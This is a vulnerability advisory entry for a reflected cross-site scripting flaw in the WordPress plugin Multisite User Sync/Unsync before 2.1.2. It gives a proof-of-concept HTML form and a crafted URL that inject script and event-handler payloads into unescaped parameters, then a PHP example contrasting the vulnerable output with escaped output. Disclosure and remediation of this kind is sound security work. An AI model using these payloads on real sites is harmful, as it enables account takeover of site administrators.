WordPress Plugin Vulnerabilities

Multisite User Sync/Unsync < 2.1.2 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the wmus_source_blog and wmus_record_per_page parameters before outputting them back in HTML attributes, leading to Reflected Cross-Site Scripting issues.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/network/admin.php?page=wmus" method="POST">
      <input type="hidden" name="wmus_source_blog" value='1"><script>alert(/XSS-source_blog/)</script>' />
      <input type="hidden" name="wmus_record_per_page" value='10"><script>alert(/XSS-record/)</script>' />
      <input type="hidden" name="submit" value="Filter" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

https://example.com/wp-admin/network/admin.php?page=wmus&s=lxk1g%22+onfocus%3Dalert%281%29+autofocus%3D+xaycjmgr032&wmus_source_blog=1&wmus_record_per_page=12&wmus_sync_unsync=1&wmus_destination_blogs%5B0%5D=2&wmus_destination_blogs%5B1%5D=3&wmus_destination_blogs%5B2%5D=4&wmus_destination_blogs%5B3%5D=5&submit=Sync%2FUnsync
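The unescaped-attribute pattern described above, next to a hardened version, as an added example that is not the plugin's own code. The function names and the way the fields are rendered are assumptions; esc_attr() and absint() are the WordPress core helpers, with stand-ins defined so the file also runs under plain PHP.

```php
<?php
// Added illustration, not the plugin's source; function names are hypothetical.
// Stand-ins so this runs under plain PHP CLI; WordPress provides the real ones.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('absint')) {
    function absint($value) {
        return abs((int) $value);
    }
}

// Vulnerable pattern: request values concatenated straight into attributes,
// so a double quote in the value closes the attribute early.
function render_filter_unsafe(array $req) {
    return '<input name="s" value="' . $req['s'] . '">'
         . '<input name="wmus_source_blog" value="' . $req['wmus_source_blog'] . '">'
         . '<input name="wmus_record_per_page" value="' . $req['wmus_record_per_page'] . '">';
}

// Hardened pattern: numeric fields are coerced to non-negative integers,
// and every value is escaped for the attribute context on output.
function render_filter_safe(array $req) {
    $blog     = absint($req['wmus_source_blog'] ?? 0);
    $per_page = absint($req['wmus_record_per_page'] ?? 0);
    return '<input name="s" value="' . esc_attr($req['s'] ?? '') . '">'
         . '<input name="wmus_source_blog" value="' . esc_attr($blog) . '">'
         . '<input name="wmus_record_per_page" value="' . esc_attr($per_page) . '">';
}

// Constructed request, reusing the parameter values from the proof of concept.
$request = array(
    's'                    => 'lxk1g" onfocus=alert(1) autofocus= xaycjmgr032',
    'wmus_source_blog'     => '1"><script>alert(/XSS-source_blog/)</script>',
    'wmus_record_per_page' => '10"><script>alert(/XSS-record/)</script>',
);

echo "unsafe: " . render_filter_unsafe($request) . "\n";
echo "safe:   " . render_filter_safe($request) . "\n";
```

In the safe output the two numeric fields collapse to 1 and 10, and the quote in s is emitted as &quot;, so the value stays inside its attribute.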

Classification

Type
XSS

Miscellaneous

Original Researcher
Asif Nawaz Minhas
Verified
Yes

Timeline

Publicly Published
2022-02-07 (about 2 years ago)
Added
2022-02-07 (about 2 years ago)
Last Updated
2023-04-12 (about 1 year ago)
